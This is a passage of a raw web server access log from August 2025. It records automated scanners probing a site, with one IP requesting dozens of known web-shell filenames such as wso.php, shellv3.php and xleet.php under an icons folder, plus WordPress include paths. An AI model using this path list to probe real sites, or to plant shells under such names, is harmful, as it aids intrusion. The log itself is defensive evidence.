18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:09:56:44 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [12/Aug/2025:09:56:44 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:09:56:44 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:09:59:54 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.203.144 - - [12/Aug/2025:09:59:54 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 144.126.240.247 - - [12/Aug/2025:09:59:54 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.190.67 - - [12/Aug/2025:09:59:54 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 52.23.225.234 - - [12/Aug/2025:10:02:44 -0400] "GET /wp-includes/Requests/index.php HTTP/1.1" 301 261 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 52.23.225.234 - - [12/Aug/2025:10:08:57 -0400] "GET /wp-includes/SimplePie/plugins.php HTTP/1.1" 301 264 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 149.50.212.214 - - [12/Aug/2025:10:11:07 -0400] "GET /our-clinics/img/icons/soul.php HTTP/1.1" 301 266 "-" "Mozilla/5.0 (X11; U; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/115.0.5810.222 Chrome/115.0.5810.222 Safari/537.36" 89.188.76.176 - - [12/Aug/2025:10:11:08 -0400] "GET /our-clinics/img/icons/soul.php HTTP/1.1" 301 266 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:10:11:08 -0400] "GET /our-clinics/img/icons/soul.php HTTP/1.1" 301 266 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/114.0.5775.194 Chrome/114.0.5775.194 Safari/537.36" 149.102.237.41 - - [12/Aug/2025:10:11:22 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:10:11:22 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [12/Aug/2025:10:11:22 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:10:11:22 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:10:11:31 -0400] "GET /our-clinics/img/icons/soul.php HTTP/1.1" 301 266 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.5 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:10:11:57 -0400] "GET /favicon.ico HTTP/1.1" 301 247 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/114.0.5775.194 Chrome/114.0.5775.194 Safari/537.36" 68.183.245.101 - - [12/Aug/2025:10:11:59 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:10:11:59 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:10:11:59 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [12/Aug/2025:10:11:59 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 146.190.11.185 - - [12/Aug/2025:10:13:44 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:10:13:44 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 164.90.241.135 - - [12/Aug/2025:10:13:44 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.203.144.167 - - [12/Aug/2025:10:13:44 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 52.23.225.234 - - [12/Aug/2025:10:14:39 -0400] "GET /wp-includes/SimplePie/index.php HTTP/1.1" 301 262 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 212.143.94.239 - - [12/Aug/2025:10:15:06 -0400] "GET / HTTP/1.1" 301 231 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0" 152.42.157.60 - - [12/Aug/2025:10:17:25 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.89.216.7 - - [12/Aug/2025:10:17:25 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 174.138.112.39 - - [12/Aug/2025:10:17:25 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 170.64.252.169 - - [12/Aug/2025:10:17:25 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 157.230.195.44 - - [12/Aug/2025:10:17:31 -0400] "GET /our-clinics/img/icons/soul.php HTTP/1.1" 301 266 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/114.0.5775.194 Chrome/114.0.5775.194 Safari/537.36" 38.54.105.230 - - [12/Aug/2025:10:19:06 -0400] "GET /our-clinics/ HTTP/1.1" 301 248 "-" "Mozilla/5.0 (X11; U; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/115.0.5810.222 Chrome/115.0.5810.222 Safari/537.36" 152.42.157.60 - - [12/Aug/2025:10:19:06 -0400] "GET /our-clinics/ HTTP/1.1" 301 248 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.11.185 - - [12/Aug/2025:10:19:11 -0400] "GET /our-clinics/ HTTP/1.1" 301 248 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Mobile Safari/537.36" 152.42.157.60 - - [12/Aug/2025:10:20:10 -0400] "GET /our-clinics/ HTTP/1.1" 301 248 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.5 Mobile/15E148 Safari/604.1" 52.23.225.234 - - [12/Aug/2025:10:20:11 -0400] "GET /wp-includes/SimplePie/index.php HTTP/1.1" 301 262 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 152.42.157.60 - - [12/Aug/2025:10:21:03 -0400] "GET /favicon.ico HTTP/1.1" 301 247 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 216.73.216.186 - - [12/Aug/2025:10:22:41 -0400] "GET /robots.txt HTTP/1.1" 301 241 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" 216.73.216.186 - - [12/Aug/2025:10:23:21 -0400] "GET /.well-known/acme-challenge/VPs16jKI80Utt-rE2GnRlm6Z4kIl488rvwGfSLo87xU HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" 216.73.216.186 - - [12/Aug/2025:10:23:21 -0400] "GET /.well-known/acme-challenge/bPXKj8aDyWBUPOn-UdhKethWBx60uS3Rvp6hR0DVMuw HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" 209.38.125.40 - - [12/Aug/2025:10:25:27 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.102.237.41 - - [12/Aug/2025:10:25:27 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [12/Aug/2025:10:25:27 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:10:25:29 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [12/Aug/2025:10:27:19 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:10:27:19 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:10:27:19 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [12/Aug/2025:10:27:20 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:10:29:23 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 144.126.240.247 - - [12/Aug/2025:10:29:23 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.203.144 - - [12/Aug/2025:10:29:23 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.190.67 - - [12/Aug/2025:10:29:23 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:31 -0400] "GET /our-clinics/img/icons/soul.php HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:31 -0400] "GET /our-clinics/img/icons/ppjl__KAFatmENfdf.php HTTP/1.1" 301 279 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:31 -0400] "GET /our-clinics/img/icons/EuaEovShNivvcMbZ2G.php HTTP/1.1" 301 280 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:32 -0400] "GET /our-clinics/img/icons/vCpanBXx4Z4IDelWTvO.php HTTP/1.1" 301 281 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:32 -0400] "GET /our-clinics/img/icons/alfditz.php HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:33 -0400] "GET /our-clinics/img/icons/cong.php HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:33 -0400] "GET /our-clinics/img/icons/index1.php HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:34 -0400] "GET /our-clinics/img/icons/alfanewditz.php HTTP/1.1" 301 273 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:34 -0400] "GET /our-clinics/img/icons/wsoditz1.php HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:34 -0400] "GET /our-clinics/img/icons/wpautoedit.php HTTP/1.1" 301 272 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:35 -0400] "GET /our-clinics/img/icons/wsoditz.php HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:35 -0400] "GET /our-clinics/img/icons/test.php HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:36 -0400] "GET /our-clinics/img/icons/index.php HTTP/1.1" 301 267 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:36 -0400] "GET /our-clinics/img/icons/options.php HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:37 -0400] "GET /our-clinics/img/icons/item.php HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:37 -0400] "GET /our-clinics/img/icons/admin.php HTTP/1.1" 301 267 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:37 -0400] "GET /our-clinics/img/icons/cache.php HTTP/1.1" 301 267 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:38 -0400] "GET /our-clinics/img/icons/product.php HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:38 -0400] "GET /our-clinics/img/icons/wpo.php HTTP/1.1" 301 265 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:39 -0400] "GET /our-clinics/img/icons/click.php HTTP/1.1" 301 267 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:39 -0400] "GET /our-clinics/img/icons/mah.php HTTP/1.1" 301 265 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:39 -0400] "GET /our-clinics/img/icons/shellv3.php HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:40 -0400] "GET /our-clinics/img/icons/plugins.php HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:40 -0400] "GET /our-clinics/img/icons/networks.php HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:41 -0400] "GET /our-clinics/img/icons/wp-log1n.php HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:41 -0400] "GET /our-clinics/img/icons/wso.php HTTP/1.1" 301 265 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:42 -0400] "GET /our-clinics/img/icons/unzip.php HTTP/1.1" 301 267 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:42 -0400] "GET /our-clinics/img/icons/sym403bp.php HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:42 -0400] "GET /our-clinics/img/icons/lufix.php HTTP/1.1" 301 267 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:43 -0400] "GET /our-clinics/img/icons/defaults.php HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:43 -0400] "GET /our-clinics/img/icons/doiconvs.php HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:44 -0400] "GET /our-clinics/img/icons/akcc.php HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:44 -0400] "GET /our-clinics/img/icons/install.php HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:44 -0400] "GET /our-clinics/img/icons/xleet.php HTTP/1.1" 301 267 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:45 -0400] "GET /our-clinics/img/icons/page-login.html HTTP/1.1" 301 273 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:45 -0400] "GET /our-clinics/img/icons/logout.php HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:46 -0400] "GET /our-clinics/img/icons/userfuns.php HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:46 -0400] "GET /our-clinics/img/icons/pending.php HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:47 -0400] "GET /our-clinics/img/icons/edit.php HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:47 -0400] "GET /our-clinics/img/icons/goods.php HTTP/1.1" 301 267 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:47 -0400] "GET /our-clinics/img/icons/.f35.php HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:48 -0400] "GET /our-clinics/img/icons/advices.php HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:48 -0400] "GET /our-clinics/img/icons/wpterms.php HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:49 -0400] "GET /our-clinics/img/icons/wp-login.php HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:35:49 -0400] "GET /our-clinics/img/icons/login.php HTTP/1.1" 301 267 "-" "Mozilla/5.0 (Windows NT 